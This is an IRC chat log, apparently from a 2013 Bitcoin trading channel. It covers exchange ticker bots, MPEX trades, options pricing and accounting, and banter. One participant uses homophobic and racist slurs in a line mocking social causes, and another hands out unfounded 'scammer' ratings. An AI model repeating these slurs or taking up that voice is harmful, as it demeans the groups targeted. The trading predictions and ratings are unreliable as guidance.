11300 @ 0.00062944 = 7.1127 BTC [+] Feb 12 00:22:51 i hear all the talk about sticking it to the system but can it Feb 12 00:23:20 what about all the ppl without computers Feb 12 00:24:02 [MPEX] [S.MPOE] 7950 @ 0.00062944 = 5.004 BTC [+] Feb 12 00:24:04 [MPEX] [S.MPOE] 5300 @ 0.00063265 = 3.353 BTC [+] Feb 12 00:24:50 they got mobiles. Feb 12 00:25:44 all the rich ppl can buy fast pcs and get most of the rewards Feb 12 00:26:00 the what Feb 12 00:26:06 btc Feb 12 00:26:08 ok this is enough of that. Feb 12 00:26:15 truffles!*@* added to ignore list. Feb 12 00:26:58 id guess you are on his ignore list by now. Feb 12 00:31:47 [MPEX] [S.MPOE] 3000 @ 0.00063521 = 1.9056 BTC [+] Feb 12 00:32:09 i think its cute. Feb 12 00:34:57 [MPEX] [S.MPOE] 10050 @ 0.00062683 = 6.2996 BTC [-] Feb 12 00:34:59 [MPEX] [S.MPOE] 19568 @ 0.00062675 = 12.2642 BTC [-] Feb 12 00:35:01 [MPEX] [S.MPOE] 1032 @ 0.00062656 = 0.6466 BTC [-] Feb 12 00:35:41 truffles: this is old, we dont want to hear it Feb 12 00:40:40 [MPEX] [S.MPOE] 8673 @ 0.00062656 = 5.4342 BTC [-] Feb 12 00:40:42 [MPEX] [S.MPOE] 8061 @ 0.00062628 = 5.0484 BTC [-] Feb 12 00:40:50 [MPEX] [S.MPOE] 100 @ 0.00062628 = 0.0626 BTC [-] Feb 12 00:40:52 [MPEX] [S.MPOE] 10 @ 0.00062628 = 0.0063 BTC [-] Feb 12 00:40:58 [MPEX] [S.MPOE] 10 @ 0.00062628 = 0.0063 BTC [-] Feb 12 00:40:59 [MPEX] [S.MPOE] 10 @ 0.00062628 = 0.0063 BTC [-] Feb 12 00:41:04 [MPEX] [S.MPOE] 10 @ 0.00062628 = 0.0063 BTC [-] Feb 12 00:41:06 [MPEX] [S.MPOE] 1226 @ 0.00062608 = 0.7676 BTC [-] Feb 12 00:45:37 [MPEX] [S.MPOE] 2700 @ 0.00063136 = 1.7047 BTC [+] Feb 12 00:49:08 lol that were my lil testing orders Feb 12 00:49:32 at least no need to remove them now Feb 12 00:50:09 truffles, how much do you want to pay for some juicy bit of history? Feb 12 00:50:19 i'm sure i can dig something Feb 12 00:54:53 payment accepted. so i present you this snippet featuring mircea_popescu: http://bash.org/?953990 Feb 12 00:55:22 Quote #953990 is pending moderation. ? Feb 12 00:55:44 shenanigans, i call them. Feb 12 00:56:03 he got equivalent value for air btcs. Feb 12 00:56:32 but once it will get unmoderated, it's really #bitcoin-assets quote, i've added myself Feb 12 01:00:48 http://mywabashvalley.com/fulltext?nxd_id=292862 Feb 12 01:00:54 the news from indiana. Feb 12 01:02:31 did u see the coffee enema addicts from florida? Feb 12 01:02:44 ;;ticker Feb 12 01:02:45 BTCUSD ticker | Best bid: 24.48786, Best ask: 24.52214, Bid-ask spread: 0.03428, Last trade: 24.43271, 24 hour volume: 29403.49796069, 24 hour low: 23.64560, 24 hour high: 24.54000, 24 hour vwap: 24.09918 Feb 12 01:03:05 lol http://thenextweb.com/insider/2013/02/11/elon-musk-calls-nytimes-review-of-the-tesla-model-s-fake-citing-vehicle-log-data-as-proof/ Feb 12 01:03:08 Bugpowder_ yah Feb 12 01:03:20 jurov omg they shoud be in bitcoin Feb 12 01:03:22 delishious drama Feb 12 01:04:08 yeah, maybe the reporter was btc miner and drained the battery :DD Feb 12 01:04:19 ahahaha Feb 12 01:04:25 HASHING TESLA! Feb 12 01:04:34 giving pool hopping a whole new mining. Feb 12 01:05:00 lol Feb 12 01:05:38 inb4 it turns out the tesla logging stuff had a bug in it Feb 12 01:11:15 wait Feb 12 01:21:43 wait what? Feb 12 01:23:13 nm lol Feb 12 01:27:41 http://baselinescenario.com/2013/02/09/the-importance-of-excel/ Feb 12 01:28:35 my brother does even industry energy calculations in excel Feb 12 01:29:01 recently asked me about help importing 500k data points from some measurements Feb 12 01:29:18 why excel Feb 12 01:29:41 cause excel. whole article/discussion is about that. Feb 12 01:29:58 after a while i gave up and did it for him in perl Feb 12 01:30:21 “After subtracting the old rate from the new rate, the spreadsheet divided by their sum instead of their average, as the modeler had intended. This error likely had the effect of muting volatility by a factor of two and of lowering the VaR . . .” Feb 12 01:30:23 juicy. Feb 12 01:30:31 ;;bc,convert eur Feb 12 01:30:32 1 BTC = 24.61000 U.S. dollars = 18.3793876 Euros Feb 12 01:30:40 ;;ticker Feb 12 01:30:41 BTCUSD ticker | Best bid: 24.56393, Best ask: 24.61000, Bid-ask spread: 0.04607, Last trade: 24.61000, 24 hour volume: 30001.60733989, 24 hour low: 23.64560, 24 hour high: 24.61000, 24 hour vwap: 24.11142 Feb 12 01:30:52 nice Feb 12 01:31:04 Microsoft Excel is one of the greatest, most powerful, most important software applications of all time.** Feb 12 01:31:05 what the fuck. Feb 12 01:31:09 who writes this shit. Feb 12 01:31:28 dude. gcc is one of the greatest, more powerful, most important software "applications", w/e that means, of all time. Feb 12 01:31:30 sadly it's the opinion of most everybody, really Feb 12 01:31:35 vi. emacs. gnupg. Feb 12 01:31:39 fuck excell. what's it even for ?! Feb 12 01:32:37 vaguely related, http://trilema.com/2012/law-enforcement-never-fails-to-unintentionally-entertain/ Feb 12 01:36:23 incidentally, "Wall Street doesn't have a great recent history with outside reviews either. JPMorgan and other banks recently shut down external reviews of their foreclosure practices" Feb 12 01:36:27 it's not just mpex! Feb 12 01:53:04 excel is a program to read microsoft's proprietary binary version of csv files Feb 12 01:53:33 oh yeah the newer ones are allegedly xml Feb 12 02:10:22 http://trilema.com/2013/why-mpex-is-better-than-fiat-institutions-part-349085-we-dont-use-excel/ Feb 12 02:10:31 all the juicy details of jpmorgan's embarassment included. Feb 12 02:16:26 !ticker m s.dice Feb 12 02:19:17 come back assbot Feb 12 02:21:21 http://mpex.co/faq_pe.html Feb 12 02:21:27 check this shit out, mpex faq in farsi Feb 12 02:24:17 u should get it in arabi Feb 12 02:24:18 c Feb 12 02:25:05 This site feels really professional now. I think I can invest now. Feb 12 02:26:26 i will get it in arabic Feb 12 02:29:28 the farsi looks awesome Feb 12 02:29:50 not that i know what it says, lol. but it /looks/ awesome Feb 12 02:30:08 it does Feb 12 02:30:17 both chinese and persian are actually very aesthetically pleasing notations Feb 12 02:30:20 I hate how that language is aligned to the right side Feb 12 02:31:01 well it;s one of thiose Feb 12 02:31:13 speakingof which, the one i really have to get is hebrew Feb 12 02:31:16 AND idish Feb 12 02:32:26 how do you say "idiot" in farsi? Feb 12 02:32:41 Feb 12 02:32:43 he coped out, said "stupids" Feb 12 02:33:30 مردم احمق Feb 12 02:33:44 haha Feb 12 02:33:49 احمق being stoopid Feb 12 02:35:23 hey, my tatoo artist told me that meant "brave warrior" Feb 12 02:35:33 seems accurate. Feb 12 02:54:44 ;;slap eskimobob Feb 12 02:59:44 ;;ticker Feb 12 02:59:44 BTCUSD ticker | Best bid: 24.51079, Best ask: 24.54000, Bid-ask spread: 0.02921, Last trade: 24.51079, 24 hour volume: 31430.66254096, 24 hour low: 23.64560, 24 hour high: 24.67503, 24 hour vwap: 24.16444 Feb 12 03:07:34 ;;asks 25 Feb 12 03:07:36 There are currently 9260.6569 bitcoins offered at or under 25.0 USD, worth 229947.752117 USD in total. Feb 12 03:07:46 ;;bids 24.5 Feb 12 03:07:48 There are currently 0 bitcoins demanded at or over 24.5 USD, worth 0.0 USD in total. Feb 12 03:07:58 ;;bids 24 Feb 12 03:07:59 ;;later tell evoorhees https://bitcointalk.org/index.php?topic=77870.msg1520259#msg1520259 he has a point there Feb 12 03:07:59 The operation succeeded. Feb 12 03:08:00 There are currently 2032.1217 bitcoins demanded at or over 24.0 USD, worth 49120.3990789 USD in total. Feb 12 03:18:04 ;;bids 23 Feb 12 03:18:06 There are currently 10428.055 bitcoins demanded at or over 23.0 USD, worth 245554.642353 USD in total. Feb 12 03:18:11 ;;bids 24 Feb 12 03:18:13 There are currently 1774.9244 bitcoins demanded at or over 24.0 USD, worth 42951.1478531 USD in total. Feb 12 03:18:16 http://i.imgur.com/FO5bs3O.png Feb 12 03:18:45 lol Feb 12 03:19:02 ahaha nowai ? Feb 12 03:19:04 who is that woman? i see here everyone online Feb 12 03:19:12 everwhere* Feb 12 03:19:34 that's the fearsome mpoe-pr Feb 12 03:21:56 picture from https://bitcointalk.org/index.php?topic=92969.msg1519140#msg1519140 Feb 12 03:22:17 that your PR front MP? Feb 12 03:22:35 my pr, yes. Feb 12 03:23:11 it couldn't hurt. Feb 12 03:24:27 heh, you would think Feb 12 03:24:40 if you were to just guess Feb 12 03:25:56 i'm a great guesser. Feb 12 03:26:15 apparently not Feb 12 03:26:47 bam! Feb 12 03:27:07 hard to argue with an idiot, eh? Feb 12 03:28:28 http://polimedia.us/dtng/c/src/13606324795.jpg have a prize Feb 12 03:28:59 plastic wrapped. that must mean they're fresh Feb 12 03:29:48 lol Feb 12 03:49:09 ;;ticker Feb 12 03:49:10 BTCUSD ticker | Best bid: 24.44617, Best ask: 24.50000, Bid-ask spread: 0.05383, Last trade: 24.44617, 24 hour volume: 31371.13774248, 24 hour low: 23.64560, 24 hour high: 24.67503, 24 hour vwap: 24.18070 Feb 12 03:50:49 !help Feb 12 03:52:05 gabridome what are you trying to do ? Feb 12 03:52:32 hi just to obtain command help.. Feb 12 03:52:51 i don't think assbot has a help implemented. Feb 12 03:52:59 pretty much what it does is Feb 12 03:53:02 !ticker m s.mpoe Feb 12 03:53:07 sort of thing Feb 12 03:53:13 gribble is Feb 12 03:53:15 ;;help Feb 12 03:53:17 The bot responds when you start a line with the ! character. A good starting point for exploring the bot is the !facts command. You can also visit the bot's website for a list of help topics and documentation: http://gribble.sourceforge.net/ Feb 12 03:53:44 thanks **** BEGIN LOGGING AT Tue Feb 12 12:30:33 2013 Feb 12 12:37:04 ;;later tell bugpowder http://i.dailymail.co.uk/i/pix/2013/02/11/article-2276884-17841A9A000005DC-22_634x815.jpg Feb 12 12:37:05 The operation succeeded. Feb 12 12:37:34 http://namcdn.com/btcalarm/ Feb 12 12:37:49 @mircea Feb 12 12:38:54 A new tool to have an eye on price 24/7 for trading options Feb 12 12:39:26 lol kinda cool. Feb 12 12:39:56 $25.20 Feb 12 12:40:24 http://bitbet.us/bet/225/bitcoin-to-surpass-gold-value-in-2013/ Feb 12 12:40:28 that's a pretty interestin bet... Feb 12 12:40:56 per gram/oz/kg? Feb 12 12:40:56 go with no on that one Feb 12 12:41:02 because per gram, maybe Feb 12 12:41:20 per 31ths of ounce comex price Feb 12 12:41:31 doubtful Feb 12 12:41:43 atm its 2:3 Feb 12 12:41:49 hence interesting Feb 12 12:41:56 25 dollars Feb 12 12:41:57 so it is per gram? Feb 12 12:41:58 holy shit Feb 12 12:42:02 ah, then yeah Feb 12 12:42:06 it's per 1/31th of ounce Feb 12 12:42:09 so practically grams yea Feb 12 12:42:19 yes 31 grams in a troy ounce Feb 12 12:42:22 31.1 Feb 12 12:42:23 why don't they just say that Feb 12 12:42:34 prolly lazy Feb 12 12:42:41 also gold grams aren't really priced anywherew Feb 12 12:42:41 create confusion Feb 12 12:42:43 So.. where are the bears Feb 12 12:42:55 what's gold atm, 1650 ? Feb 12 12:43:02 around 50 a gram or something Feb 12 12:43:10 ;;calc 1650 / 31 Feb 12 12:43:10 53.2258064516 Feb 12 12:43:12 ya Feb 12 12:43:38 it could beat it Feb 12 12:43:40 http://www.foxnews.com/science/2013/02/11/cnn-anchor-blames-asteroid-on-global-warming/ Feb 12 12:43:47 does it just have to go over it, or by end of year it has to be over it? Feb 12 12:43:49 this has to be the last word in libertard lmao Feb 12 12:44:38 Well anyway, I'm out Feb 12 12:44:45 goodbye Feb 12 12:44:45 sleep tight Feb 12 12:44:50 adios Feb 12 12:44:51 at this rate, we Feb 12 12:44:56 w'd see 3 digits Feb 12 12:45:01 soon Feb 12 12:45:01 i love bitcoin, it fucks over people's sleep. Feb 12 12:45:08 yah Feb 12 12:45:13 25 dollars Feb 12 12:45:14 holy shit Feb 12 12:45:37 i shoulda dumped at least 10k on this thing Feb 12 12:45:38 ;;ticker Feb 12 12:45:39 BTCUSD ticker | Best bid: 25.28000, Best ask: 25.30000, Bid-ask spread: 0.02000, Last trade: 25.30000, 24 hour volume: 38689.86085846, 24 hour low: 23.64560, 24 hour high: 25.30000, 24 hour vwap: 24.44526 Feb 12 12:45:46 look at the goxlive Feb 12 12:45:48 woulda been ballsy Feb 12 12:45:51 well, shoulda coulda woulda... Feb 12 12:45:55 prolly too late by now Feb 12 12:45:56 or is it ? Feb 12 12:45:58 http://mtgoxlive.com/orders Feb 12 12:46:01 ooh Feb 12 12:46:24 id be damned if btc reaches 1k Feb 12 12:46:25 ea' Feb 12 12:46:28 O_O Feb 12 12:46:30 30 looks possible. Feb 12 12:46:34 id be a lazy fat cat Feb 12 12:46:39 if that happens Feb 12 12:46:56 i'll prolly be having dinners at the white house, if tht happens Feb 12 12:47:23 so mp, hows the trolling contest no Feb 12 12:47:23 w Feb 12 12:47:27 anything notable? Feb 12 12:47:49 well... so far buncha sa selfowning Feb 12 12:48:03 that forum looks disgusting Feb 12 12:48:04 but nothing substantial. Feb 12 12:48:18 they're basically a buncha bitcoiners w/o bitcoin Feb 12 12:48:27 but with equal faith in collectivism, being nice and whatnot Feb 12 12:48:27 lol Feb 12 12:48:46 a, and the various craps du jour. helping fags, women, niggers etc. Feb 12 12:48:59 saving da planet, and whales Feb 12 12:49:04 i forget what all is on the list. Feb 12 12:49:36 mp for prez Feb 12 12:50:18 lol noty. Feb 12 12:50:52 u dont really have to do much just play gold Feb 12 12:50:54 golf Feb 12 12:51:15 i dont like golf. Feb 12 12:51:25 i'd much rather just walk in a town than on a pasture. Feb 12 12:56:04 hey kakobreklaa, would it be possible for assbot to have a !last x y which'd replay the last trade of y on x ? Feb 12 12:56:54 buying a 1 bedroom condo in dt vancouver, 5 BTC pm me Feb 12 12:57:09 1 bedroom condos ?! Feb 12 12:57:16 mhm? Feb 12 12:57:19 yap Feb 12 12:57:27 these seriously exist ?! Feb 12 12:57:34 yeah Feb 12 12:57:34 why Feb 12 12:57:46 i thought condo-ing was a sort of upscale affair Feb 12 12:58:04 I typed 1 bedroom condo in google Feb 12 12:58:11 it showed an ad in vancouver Feb 12 12:58:15 maybe its a vancouver thing Feb 12 12:58:29 here, condos are relatively cheap. detached houses are a million bucks each Feb 12 12:58:30 hey. learn something new everyday Feb 12 12:58:56 i know in other countries condos are expensive and detatched houses are cheap Feb 12 12:58:59 but yes, seems it's 90% a canada thing Feb 12 13:00:04 well, here in vancouver the homeowners rent their basement out to pay for mortgage Feb 12 13:00:19 haha literally basement dwellers ? Feb 12 13:00:21 since no one can pony up a million bucks Feb 12 13:00:23 yeah Feb 12 13:00:51 actually we started as basement dwellers.. until we switched to a house Feb 12 13:01:07 mortgage is insane, 2k a month Feb 12 13:01:11 lol Feb 12 13:01:21 Bowjob: next time I fly out that way, we can meet up Feb 12 13:01:27 but. parents are paying so im getting a free ride. Feb 12 13:02:10 i wouldnt buy this house even if i had the money but its pretty nice Feb 12 13:02:15 actually, Bowjob, if your interested, I have someone who is looking to buy weex CAD Feb 12 13:03:13 btc to cad? Feb 12 13:03:34 actually, he just needs a canuk to deposit cad into weex so he can hold weex cad Feb 12 13:03:47 not sure how he wants to settle up Feb 12 13:03:59 but you would need a bank account at rbc, scotia, td or BoM Feb 12 13:04:31 Ah. I'm with a credit union Feb 12 13:04:38 free debit card.. Feb 12 13:04:49 ah Feb 12 13:04:59 thanks then. just trying to put people together. :) Feb 12 13:05:02 td is charging 15 dollars per month for a debit Feb 12 13:06:07 lol im not really a canuck. i didnt participate in the riots Feb 12 13:06:14 thats insane. Royal gave me a free debit caard that masquerades on the net as a credit card Feb 12 13:07:30 ooh. they are now charging 2 dollars to deposit paper money .. per 1000 Feb 12 13:07:32 wtf is this Feb 12 13:07:48 oh wait its business account lol Feb 12 13:12:31 heh the amusements continue i see Feb 12 13:12:46 ;;eauth mircea_popescu Feb 12 13:12:48 Request successful for user mircea_popescu, hostmask mircea_popescu!~Mircea@pdpc/supporter/silver/mircea-popescu. Get your encrypted OTP from http://bitcoin-otc.com/otps/8A736F0E2FB7B452 Feb 12 13:13:17 ;;everify freenode:#bitcoin-otc:756619e2969805ca04cc00f67579d291c815df246f20807f9c7515ea Feb 12 13:13:18 Error: In order to authenticate, you must be present in one of the following channels: #bitcoin-otc;#bitcoin-otc-foyer;#bitcoin-otc-ru;#bitcoin-otc-eu;#bitcoin-otc-uk;#bitcoin-otc-bans Feb 12 13:13:58 ;;rate fbastage -10 Never interacted with the guy. Prolly a scammer per https://bitcointalk.org/index.php?topic=101902.msg1516695#msg1516695 Feb 12 13:13:59 Error: For identification purposes, you must be identified via GPG to use the rating system. Feb 12 13:14:05 doh ?! Feb 12 13:14:19 ;;everify freenode:#bitcoin-otc:756619e2969805ca04cc00f67579d291c815df246f20807f9c7515ea Feb 12 13:14:20 You are now authenticated for user mircea_popescu with key 8A736F0E2FB7B452 Feb 12 13:14:23 ;;rate fbastage -10 Never interacted with the guy. Prolly a scammer per https://bitcointalk.org/index.php?topic=101902.msg1516695#msg1516695 Feb 12 13:14:24 Rating entry successful. Your rating of -10 for user fbastage has been recorded. Feb 12 13:14:34 anybody ever try out mpex, what's it like? Feb 12 13:15:46 ;;rate eskimobob -10 Never interacted with the guy. Prolly a scammer per https://bitcointalk.org/index.php?topic=101902.msg1516695#msg1516695 Feb 12 13:15:47 Rating entry successful. Your rating of -10 for user eskimobob has been recorded. Feb 12 13:16:07 heh that's not accurate is it. Feb 12 13:16:17 i didnt know arabic text is from right to left Feb 12 13:16:31 ;;rate eskimobob -10 #bitcoin-asset's premier angry clueless noob. Prolly a scammer per https://bitcointalk.org/index.php?topic=101902.msg1516695#msg1516695 Feb 12 13:16:32 Rating entry successful. Your rating for user eskimobob has changed from -10 to -10. Feb 12 13:16:50 Bowjob yeah, most middle eastern languages are like that. Feb 12 13:29:05 haha this is rich : lowtax joins btctalk https://bitcointalk.org/index.php?action=profile;u=22158 Feb 12 13:30:10 If you are pretty confident bitcoins are just going to generally keep going up and up, are options of much use, or are they generally mostly useful if you are uncertain thus want to hedge against your uncertainty? Feb 12 13:31:15 this question presuposes that one's state of mind is more important than reality. Feb 12 13:31:17 this is not the case. Feb 12 13:31:34 however people feel is irrelevant. we don't know for a fact nor is there any clear mathematical proof that btc only goes up. Feb 12 13:31:42 consequently, hedging is both responsible and required. Feb 12 13:38:46 so options are useful to insure against it going down but not a means to increase the profit one is making from it going up? Feb 12 13:45:54 hi all Feb 12 13:46:54 you can make money going up too Feb 12 13:47:27 but you usually need to buy below the ask price to have any kind of chance Feb 12 13:47:44 you can also arb the exchanges Feb 12 13:47:58 specifically if you are fast on the other exchanges you can get better than mt. gox Feb 12 13:48:17 thats not options though Feb 12 13:48:44 coinbase is too fast...but especially overnight, if you go on camp bx or bitfloor...people leave their limit orders up and you can get a bunch under $25 Feb 12 13:49:05 maybe if one could find someone willing to buy a put at current price you could make money going up due to they wont exercise it Feb 12 13:49:06 btc-e too Feb 12 13:49:07 hey leo, was it you i was talking to about the aud law and stuff? Feb 12 13:49:22 hey BitHub yes it was Feb 12 13:49:26 but yeah, options are tough, i just got calls so i wouldn't get left behind Feb 12 13:49:34 the 17 strike option was a good deal i think Feb 12 13:49:40 ahh, how did you go, get anymore answers to your questions? Feb 12 13:49:48 i checked out the site today Feb 12 13:49:55 i'm going to speak with the head lawyer in Sydney in a few weeks Feb 12 13:49:57 where can i donate? :) Feb 12 13:50:23 if you just calculate the breakeven for each of the calls, you can find the "cheapest" one and then watch it rip lol Feb 12 13:51:02 i haven't started accepting donations officially yet but i guess you could send them here 1LeobZhdhmvQUpcdgF7MExR1CobUygUi5P Feb 12 13:51:05 in my case, yesterday my breakeven for the $17 call was 25.30 i think... Feb 12 13:51:22 thanks btw :) Feb 12 13:51:44 .5 btc coming up :) keep up the good work Feb 12 13:52:51 what does the $17 even mean if actual breakeven is 25.30 ? Feb 12 13:52:56 well Feb 12 13:53:01 sent :) Feb 12 13:53:08 you are paying for the option to buy bitcoins at $17 Feb 12 13:53:19 but if i tell you i will give you that option for $8... Feb 12 13:53:22 and you pay 25.30 minus 17 as fee? Feb 12 13:53:24 knotwork if you sell puits short Feb 12 13:53:29 you do make a lot when it goes up Feb 12 13:53:33 it doesn't make sense to use that option unless they are selling for $17+8 Feb 12 13:54:10 no...you are paying $17 (i bought the right to buy a bitcoin for $17) and I paid $8 for that right Feb 12 13:54:33 so the $17 strike options price was $8.30 per coin for the option? Feb 12 13:54:41 take O.BTCUSD.P350T. you can sell it now for 0.43102778 Feb 12 13:54:41 around there Feb 12 13:54:47 if btc goes to 36 it's worth 0 Feb 12 13:54:52 and so you made 0.43 btc PER Feb 12 13:54:55 or I guess, paid $8 and had an additional fee for the exchange of $0.30 Feb 12 13:55:06 nah, i was doing rough estimate Feb 12 13:55:09 i paid... Feb 12 13:55:27 0.33832578 bitcoins for that option Feb 12 13:55:47 which adds in the extra wrinkle of how do i calculate what i paid for the option Feb 12 13:56:10 do i calculate my average cost of bitcoins, the price at the time of purchase, or the price when i exercise.... Feb 12 13:56:18 mjr_ well you have to decide if you keep books in btc or not Feb 12 13:56:28 yeah. it is mainly an accounting decision Feb 12 13:56:31 first off Feb 12 13:56:34 and yes it is. Feb 12 13:56:45 i do it at time of purchase mjr Feb 12 13:57:26 that yields a consolidated sort of gain Feb 12 13:57:39 (value of decision to buy btc + value of decision to buy option) together Feb 12 13:58:02 yeah Feb 12 13:58:17 that makes sense Feb 12 13:58:17 i just write the amount of btc and the amount and the total amount i paid for it at the time. Feb 12 13:58:36 i have to translate back to USD unfortunately Feb 12 13:58:48 because that is how you show ridiculous gains against a failing dollar Feb 12 13:58:58 example 50 btc 1000 aud Feb 12 13:59:13 at the time or purchase Feb 12 13:59:15 of Feb 12 13:59:21 mjr_ the excruciatingly precise way to do it would be to keep separate accounts. Feb 12 13:59:21 k Feb 12 13:59:33 then do vwap price when you buy, actual price you bought at Feb 12 13:59:41 yeah true Feb 12 13:59:45 then when you do options value btc in then-current vwap and add difference to acct Feb 12 13:59:46 etc Feb 12 13:59:56 ugh, i was an accounting major, but i don't do that now because it aint fun Feb 12 14:00:18 keep it in fiat figures Feb 12 14:00:20 easier Feb 12 14:00:23 you end up with an account plan doing a. btc buying slippage gain/loss ; b. overtime btc gain/loss ; c. option entry/exit gain/loss Feb 12 14:00:23 how much were bitcoins price when people paid $8 for option to buy them for $17 ? Feb 12 14:00:26 so 3 accounts Feb 12 14:00:38 yeah Feb 12 14:00:55 i believe when i bought the option bitcoin was around $24/1btc Feb 12 14:01:12 but even so...this is a matter of precision... Feb 12 14:01:16 indeed. Feb 12 14:01:29 i think it will hit 30 by the end of the month (last friday) Feb 12 14:01:40 back when btc was about 14/each an option struck at 15 would have cost about .15 btc say, roughly, so like 2 dollars. Feb 12 14:01:43 so i am just quibbling over how much percent i will make lol Feb 12 14:01:51 now it's worth 10 bucks each, +400% Feb 12 14:02:02 so at buying coin for $17 at that moment woud only have cost you $7 (over the 17) instead of the 8 you paid for mere option? Feb 12 14:02:14 you can even do it as a constantly changing variable Feb 12 14:02:36 knotwork yes. Feb 12 14:02:49 options contain a premium obviously. being options. Feb 12 14:02:57 weird so why not just buy the damn coin instead of the option? Feb 12 14:03:11 because if they go down you lose. Feb 12 14:03:30 he paid the extra whatever , 50 cents, a dollar, to insure his 17 capital out of the 24 against the possibility of loss Feb 12 14:04:04 if you buy 1 btc at 24, then you risk 24. if you buy 1 btc synthetically via an option at 8, you risk only the 8. Feb 12 14:04:13 like profit = current exchange price - (strike + cost of option at current exchange) Feb 12 14:04:31 ok, and seller gets $8 instead of 7 but faces loss if they go down instead of up Feb 12 14:04:35 yup Feb 12 14:04:48 so in this sense it can work as leverage, even as high as 10`000% Feb 12 14:05:04 which is why people were lolling at people who lost their stuff in bitcoinica. Feb 12 14:05:49 but with options the guy you sell them to is going to exercise them at just the worst moment for the seller Feb 12 14:06:27 possibly. Feb 12 14:06:27 whereas owning the coins you dont care if they go down if you "know" its just a matter of time before they go back up, aks that the momentary down is just momentary Feb 12 14:06:38 with options that momentary down is where buyer will nail you Feb 12 14:06:51 it does use the 24 hour avg price tho Feb 12 14:06:57 so it has to be really down not just spot down Feb 12 14:07:06 so buyer just needs to manipulate the oracle into reportying a momentary low and exercise Feb 12 14:07:16 and in any event it's better than bitcoinica-style forced liquidation event. Feb 12 14:07:28 also Feb 12 14:07:30 oh ok average helps make oracle resistant to maniulating to some extent Feb 12 14:07:33 kinda hard to manipulate the 24 hour average. Feb 12 14:07:35 they may not exercise when it's worst Feb 12 14:07:38 since they can't kinow that Feb 12 14:07:43 yeah, they may think it will go even lower. Feb 12 14:07:53 if i could pick bottoms and tops, i would be a billionaire Feb 12 14:07:56 oh right Feb 12 14:07:59 exactly. it's a market after all. Feb 12 14:08:11 they can't go retroactively and say i buy here i sell there Feb 12 14:08:17 yeah, more than likely, they will wait and if it turns around they will exercise there Feb 12 14:08:26 missing a little profit Feb 12 14:08:28 mjr_ and THEN it collapses Feb 12 14:08:29 lol Feb 12 14:08:34 and they kick themselves Feb 12 14:08:41 this channel log is full of such adventures Feb 12 14:08:42 lol true Feb 12 14:08:45 not just optiopns, stocks too etc. Feb 12 14:08:49 look at apple Feb 12 14:08:54 yah Feb 12 14:08:56 market is market. Feb 12 14:09:00 that is a perfect example of not being able to find tops or bottoms Feb 12 14:09:12 some peple sold apple at $25 and thought they were genius's Feb 12 14:09:23 others bought at 699 thinking it couldn't go down Feb 12 14:09:27 lol Feb 12 14:09:44 the market can remain irrational longer than you can remain solvent Feb 12 14:10:13 that's not actually true. for instance all of asicminer is like 50-100k btc. Feb 12 14:10:16 anyways, with my call, which is my favorite single legged strategy, i will prob just let it auto exercise at the end of the month Feb 12 14:10:17 it can't outsolventize me. Feb 12 14:10:31 however, this is the #1 risk i face. one day it will be the case, and ima try not to get fucked then. Feb 12 14:10:31 that is true Feb 12 14:10:37 yeah Feb 12 14:10:46 by selling the right kind(s) of options can you ensure you never actually lose what you had, worst loss you could have is just not making as much as you might have if if you hadnt sold those options? Feb 12 14:10:57 but what i said earlier is the reason why "martingaling" doesn't work over the long run Feb 12 14:10:59 knotwork you can lock profits in. Feb 12 14:11:10 yes, or protect against big downsides Feb 12 14:11:13 say you bought calls and they are now up. you can buy puts and pretty much lock it. Feb 12 14:11:19 yes true Feb 12 14:11:21 or if you sold puts short, you can sell calls too Feb 12 14:11:25 or buy them back Feb 12 14:11:30 strangle/straddle Feb 12 14:11:30 it's really very complex/flexible Feb 12 14:11:40 yep, but options strategies are my favorite Feb 12 14:11:43 the only thing is, it needs thinking Feb 12 14:11:51 unlike forexy things where you just mash the buy/sell buttons Feb 12 14:11:51 it's just hard when pretty much i think "it's going up" Feb 12 14:11:55 you need a strategy here Feb 12 14:12:05 well...aren't there options on currency? Feb 12 14:12:10 surely. Feb 12 14:12:14 yeah nice thing about just holding one's coins indefinitely is it doesnt need much/any thought Feb 12 14:12:16 most retail plays forex (and gets scammed) Feb 12 14:12:20 most serious investors do options Feb 12 14:12:23 (like buffett etc) Feb 12 14:12:30 knotwork very true. Feb 12 14:12:36 yes, i would definitely sell calls on the US dollar Feb 12 14:12:46 they went down from $32 but lately its finally looking like they are recovering Feb 12 14:12:48 with a far out enough expiration date Feb 12 14:12:55 mjr_ selling calls on the usd or buying calls on the btc are very similar i think Feb 12 14:13:01 exactly Feb 12 14:13:13 you can describe my positoin as bearish us dollar, or bullish bitcoin Feb 12 14:13:21 I missed opportunities I could have in theory got by selling high and buying back in low but I could not be sure there would ever be a low to buy back in at Feb 12 14:13:21 it is more bullish bitcoin than anything Feb 12 14:13:21 still some decoupling, but as btc mkt cap increases there will be less and less. Feb 12 14:13:29 knotwork exactly. Feb 12 14:13:41 you can conceivably make money still just by market making and arbing different exchanges Feb 12 14:13:53 especially very early in the morning or late at night Feb 12 14:14:08 (though i realize it is global) Feb 12 14:14:10 early morning/late at night where? Feb 12 14:14:20 new york. he does have sorta a point Feb 12 14:14:21 yes...mostly US and europe i would guess Feb 12 14:14:33 i mean...i was watching around 3am NYC Feb 12 14:14:42 you could still scoop up btc for under 25 on camp bx Feb 12 14:14:51 how many though Feb 12 14:15:14 eh, like 10 btc under 25 Feb 12 14:15:14 i think arbing the fiat exchanges is more work than it's worth. Feb 12 14:15:19 they are already taken Feb 12 14:15:23 i agree Feb 12 14:15:33 i mean, take the havelock/mpex s.dice difference. Feb 12 14:15:36 not enough volatitliy and razor thin margins cuz of transferring money back and forth Feb 12 14:15:41 there's like, what, 3-4 btc worth to be made arbing that ? Feb 12 14:15:53 i doubt there's 100 bux to be made working campbx/stamp/mtgox/w/e Feb 12 14:16:00 yeah i see high prices at havelock, then i look at the order size, right Feb 12 14:16:01 depends Feb 12 14:16:10 if its a bot... Feb 12 14:16:12 pigeons yest like 28 lots sold at 76 Feb 12 14:16:20 http://www.digitaltrends.com/web/virtual-bitcoins-can-now-be-traded-for-dominos-pizza/ Feb 12 14:16:24 i think book is deceptive, as btc ppl are very impatient. Feb 12 14:16:45 at dominos? cause i used jjjrmy's bitpizza in 2011 Feb 12 14:18:41 yeah, well, i mostly use the strategies i've said to try to get as long as possible, for as little money as possible Feb 12 14:19:01 yeah that is what I'd like to be able to do Feb 12 14:19:02 so if i can scoop up cheap coins on camp bx, or bitfloor, i would, simply cuz i plan on holding them Feb 12 14:19:21 only problem is you multiply CP risk Feb 12 14:19:35 kind of abstractly using my increased riches to buy more bitcoins, without actually spending my bitcoins to do so since they *are* my riches Feb 12 14:19:36 and you have way more accounting to do Feb 12 14:20:09 still no assbot Feb 12 14:20:33 